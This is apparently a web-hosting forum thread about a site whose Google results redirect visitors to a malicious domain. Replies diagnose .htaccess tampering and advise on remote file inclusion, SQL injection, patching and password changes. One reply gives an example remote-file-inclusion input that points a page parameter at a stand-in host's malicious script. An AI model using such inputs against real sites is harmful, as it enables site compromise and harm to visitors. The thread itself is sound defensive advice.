Jump to content

Google Search Link Going To Another Site


Recommended Posts



I have a website hosted at TCH.

The domain name is trini-chat dot com.


I've noticed lately that sometimes when I do a search for my site on Google and I click on the link it goes directly to another domain (http://europpc dot com/search.php?iw=1&links=trini+chat) and then that redirects to another site that Firefox deems dangerous.


Any ideas what may be causing this?



Link to comment
Share on other sites

Look in your /public_html/.htaccess file for RewriteCond code that mentions search engine names and RewriteRule code that mentions names of sites other than yours, such as the europc site, or possibly a site that is identified only by IP address.


If you find code like this, it is a common symptom of sites that have been compromised. When visitors go to your site from search engine results, they get redirected to the malicious site. If they go straight to your site, they don't get redirected.


The .htaccess file would most likely have been changed by a malicious PHP script that the hacker "tricked" one of your .php web pages into running.


It looks like many of your pages use input (query string) parameters such as "?name=Forums". When your script receives data by this way, it is important that it checks it carefully to guard against something called "remote file inclusion" <- a term to do a web search on.


For example, if someone calls your page with ....filename.php?name=hxxp://someothersite.com/maliciousscript.txt, then your site, if your PHP code doesn't guard against it, will retrieve the malicious script and run it. You have to ensure that incoming values of "name" are only acted upon if they are legitimate values that you expect. Otherwise, the incoming data should be ignored.


The above is the most common reason for this type of redirection.




It looks like you are using FlashChat. Look it up at http://secunia.com/advisories/search/. I know it has had some security vulnerabilities in the past, but I don't recall which ones or whether they are of a type that would be relevant to your current problem.

Edited by SteveW
Link to comment
Share on other sites

I would ask the help desk to check if the account has been compromised and as usual change the password to the account (a strong as possible password).


As for the strange code, I would either clean it out myself or ask the help desk if its something they can help me with, then publish the file again and see if everything works as expected.

Link to comment
Share on other sites

Also see Secunia about PHPNuke http://secunia.com/advisories/search/?search=phpnuke. There was a new vulnerability found a couple of months ago. It is an "SQL injection" vulnerability that allows outsiders to inject data into a MySQL database.


If you look in the text of your static code pages on the server and don't find the malicious code in the page, it could be that it's stored in the database and being retrieved by whatever process is getting data out of the db to build the output page.


It's important to keep all scripts updated to their latest versions.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Create New...